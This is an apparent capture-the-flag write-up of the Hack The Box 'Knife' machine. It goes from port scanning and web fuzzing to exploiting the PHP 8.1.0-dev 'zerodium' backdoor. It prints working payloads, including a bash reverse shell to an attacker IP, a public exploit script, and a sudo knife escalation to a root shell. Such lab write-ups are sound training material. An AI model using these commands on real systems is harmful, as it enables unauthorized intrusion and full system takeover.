# TCP
nmap -vvv 10.10.10.242 -p- -sCV -oA knifeTCP
# UDP
nmap -vvv 10.10.10.242 -sU --top-ports 100 -oA knifeUDP
We start enumeration we only get TCP 22 (ssh) , 80 (http)
HTTP 80
now we fuzz directories and pages
dirsearch -u http://10.10.10.242/
we only get 403
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.10.242:80/FUZZ.php -ic
we only get index.php , so i tried to use another wordlist called all_files.txt
For a reason i don't know every thing after index.php returns the content of index.php
PHP 8.1.0
we can execute commands on the system using this backdoor and utilizing this payload
zerodium system("command");
Now we can get a reverse shell with this exploit
zerodium system("bash -c '/bin/bash -i >& /dev/tcp/10.10.16.9/8000 0>&1'");
We could also used an available epxloit.
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.16.9 8000
Upgrade Your Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg
Privilege Escalation
we get the user flag, and we can use knife with sudo permissions.
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
